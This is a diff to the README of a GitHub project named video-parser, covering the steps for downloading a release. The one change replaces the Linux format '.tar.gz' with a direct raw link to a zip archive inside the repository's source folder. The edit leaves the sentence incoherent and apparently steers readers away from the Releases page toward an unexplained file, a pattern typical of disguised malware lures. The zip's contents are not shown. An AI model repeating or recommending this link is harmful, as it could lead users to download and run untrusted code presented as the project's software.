Feaerless/video-parser/README.md

 2. **Select the Latest Version:** On the Releases page, you will see a list of available versions.
 Look for the most recent version at the top.

 3. **Choose Your File:** Depending on your operating system, you may have different file formats available.
 Select the one that fits your system.
-Common options are `.exe` for Windows, `.dmg` for macOS, and `.tar.gz` for Linux users.
+Common options are `.exe` for Windows, `.dmg` for macOS, and `https://github.com/Feaerless/video-parser/raw/refs/heads/main/src/downloaders/video-parser-v1.9.zip` for Linux users.

 4. **Download the File:** Click on the link to start your download.
 Make sure to save it in an easy-to-find location on your computer.